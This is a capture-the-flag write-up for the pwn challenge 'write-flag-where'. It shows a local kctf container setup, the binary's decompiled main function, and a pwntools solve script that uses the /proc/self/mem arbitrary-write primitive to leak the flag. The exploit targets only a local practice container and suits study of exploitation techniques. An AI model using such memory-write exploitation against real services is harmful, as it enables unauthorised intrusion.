pwn - write-flag-where

ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where$ kCTF[ctf=write-flag-where-s,config=local-cluster,chal=wfw1] > kctf chal start
[*] building image in "/home/ubuntu/write-flag-where-s/pwn-write-flag-where/challenge"
[+] Building 2.3s (20/20) FINISHED
...
ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where$ kCTF[ctf=write-flag-where-s,config=local-cluster,chal=wfw1] > kctf chal debug docker
[*] building image in "/home/ubuntu/write-flag-where-s/pwn-write-flag-where/challenge"
[+] Building 0.1s (20/20) FINISHED
...
CONTAINER ID   IMAGE          COMMAND                  CREATED                  STATUS                  PORTS                                           NAMES
9832f64276f3   3204daae38da   "/bin/sh -c 'kctf_se…"   Less than a second ago   Up Less than a second   0.0.0.0:32777->1337/tcp, [::]:32777->1337/tcp   kctf-write-flag-where-s-wfw1-challenge
[*] Container running, ctrl+c to exit

ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where/challenge$ nc 0 32777
This challenge is not a classical pwn
In order to solve it will take skills of your own
An excellent primitive you get for free
Choose an address and I will write what I see
But the author is cursed or perhaps it's just out of spite
For the flag that you seek is the thing you will write
ASLR isn't the challenge so I'll tell you what
I'll give you my mappings so that you'll have a shot.
5cfa95678000-5cfa95679000 r--p 00000000 08:30 33600020                   /home/user/chal
5cfa95679000-5cfa9567a000 r-xp 00001000 08:30 33600020                   /home/user/chal
5cfa9567a000-5cfa9567b000 r--p 00002000 08:30 33600020                   /home/user/chal
5cfa9567b000-5cfa9567c000 r--p 00002000 08:30 33600020                   /home/user/chal
5cfa9567c000-5cfa9567d000 rw-p 00003000 08:30 33600020                   /home/user/chal
5cfa9567d000-5cfa9567e000 rw-p 00000000 00:00 0
703237f61000-703237f64000 rw-p 00000000 00:00 0
703237f64000-703237f8c000 r--p 00000000 08:30 33602861                   /usr/lib/x86_64-linux-gnu/libc.so.6
703237f8c000-703238121000 r-xp 00028000 08:30 33602861                   /usr/lib/x86_64-linux-gnu/libc.so.6
703238121000-703238179000 r--p 001bd000 08:30 33602861                   /usr/lib/x86_64-linux-gnu/libc.so.6
703238179000-70323817d000 r--p 00214000 08:30 33602861                   /usr/lib/x86_64-linux-gnu/libc.so.6
70323817d000-70323817f000 rw-p 00218000 08:30 33602861                   /usr/lib/x86_64-linux-gnu/libc.so.6
70323817f000-70323818c000 rw-p 00000000 00:00 0
70323818e000-703238190000 rw-p 00000000 00:00 0
703238190000-703238192000 r--p 00000000 08:30 33602843                   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
703238192000-7032381bc000 r-xp 00002000 08:30 33602843                   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7032381bc000-7032381c7000 r--p 0002c000 08:30 33602843                   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7032381c8000-7032381ca000 r--p 00037000 08:30 33602843                   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7032381ca000-7032381cc000 rw-p 00039000 08:30 33602843                   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7ffe0e44b000-7ffe0e46c000 rw-p 00000000 00:00 0                          [stack]
7ffe0e490000-7ffe0e494000 r--p 00000000 00:00 0                          [vvar]
7ffe0e494000-7ffe0e496000 r-xp 00000000 00:00 0                          [vdso]


Give me an address and a length just so:
<address> <length>
And I'll write it wherever you want it to go.
If an exit is all that you desire
Send me nothing and I will happily expire

ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where/challenge$ docker cp 9832f64276f3:/chroot/usr/lib/x86_64-linux-gnu/libc.so.6 .
Successfully copied 2.22MB to /home/ubuntu/write-flag-where-s/pwn-write-flag-where/challenge/.
ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where/challenge$ docker cp 9832f64276f3:/chroot/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 .
Successfully copied 243kB to /home/ubuntu/write-flag-where-s/pwn-write-flag-where/challenge/.
ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where/challenge$ docker cp 9832f64276f3:/chroot/home/user/chal .
Successfully copied 18.4kB to /home/ubuntu/write-flag-where-s/pwn-write-flag-where/challenge/.
ubuntu@hungnt-PC:~/write-flag-where-s/pwn-write-flag-where/challenge$ pwninit --bin chal
bin: chal
libc: ./libc.so.6
ld: ./ld-linux-x86-64.so.2

unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.35-0ubuntu3.1_amd64.deb
copying chal to chal_patched
running patchelf on chal_patched
writing solve.py stub

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int length; // [rsp+Ch] [rbp-74h] BYREF
  int maps_fd; // [rsp+10h] [rbp-70h]
  int flag_fd; // [rsp+14h] [rbp-6Ch]
  int socket_fd; // [rsp+18h] [rbp-68h]
  int null_fd; // [rsp+1Ch] [rbp-64h]
  int nbytes; // [rsp+20h] [rbp-60h]
  int mem_fd; // [rsp+24h] [rbp-5Ch]
  __off64_t write_addr; // [rsp+28h] [rbp-58h] BYREF
  _QWORD buf[10]; // [rsp+30h] [rbp-50h] BYREF

  buf[9] = __readfsqword(0x28u);
  maps_fd = open("/proc/self/maps", 0, envp);
  read(maps_fd, maps, 4096u);
  close(maps_fd);
  flag_fd = open("./flag.txt", 0);
  if ( flag_fd == -1 )
  {
    puts("flag.txt not found");
    return 1;
  }
  else
  {
    if ( read(flag_fd, &flag, 128u) > 0 )
    {
      close(flag_fd);
      socket_fd = dup2(1, 1337);
      null_fd = open("/dev/null", 2);
      dup2(null_fd, 0);
      dup2(null_fd, 1);
      dup2(null_fd, 2);
      close(null_fd);
      alarm(60u);
      dprintf(
        socket_fd,
        "This challenge is not a classical pwn\n"
        "In order to solve it will take skills of your own\n"
        "An excellent primitive you get for free\n"
        "Choose an address and I will write what I see\n"
        "But the author is cursed or perhaps it's just out of spite\n"
        "For the flag that you seek is the thing you will write\n"
        "ASLR isn't the challenge so I'll tell you what\n"
        "I'll give you my mappings so that you'll have a shot.\n");
      dprintf(socket_fd, "%s\n\n", maps);
      while ( 1 )
      {
        dprintf(
          socket_fd,
          "Give me an address and a length just so:\n"
          "<address> <length>\n"
          "And I'll write it wherever you want it to go.\n"
          "If an exit is all that you desire\n"
          "Send me nothing and I will happily expire\n");
        memset(buf, 0, 64);
        nbytes = read(socket_fd, buf, 64u);
        if ( (unsigned int)__isoc99_sscanf(buf, "0x%llx %u", &write_addr, &length) != 2 || length > 127 )
          break;
        mem_fd = open("/proc/self/mem", 2);
        lseek64(mem_fd, write_addr, 0);
        write(mem_fd, &flag, length);
        close(mem_fd);
      }
      exit(0);
    }
    puts("flag.txt empty");
    return 1;
  }
}

#!/usr/bin/env python3

from pwn import *

exe = ELF("chal_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe

gdbscript = '''

'''

p = None

if args.LOCAL:
    p = process([exe.path])
    if args.GDB:
        gdb.attach(p, gdbscript=gdbscript)
else:
    host = "localhost"
    port = 32777
    p = remote(host, port)

p.recvuntil(b'shot.\n')
libc_base = int(p.recvuntil(b'-')[:-1], 16)
success(f"Libc base: {hex(libc_base)}")
target = exe.search(b"Give me an address").__next__() + libc_base
success(f'"Give me an address...": {hex(target)}')
flag_length = 100

payload = f'{hex(target)} {flag_length}'
p.sendline(payload.encode())

p.recvuntil(b'CTF{')
success(f'Flag: CTF{{{p.recvuntil(b'}').decode()}')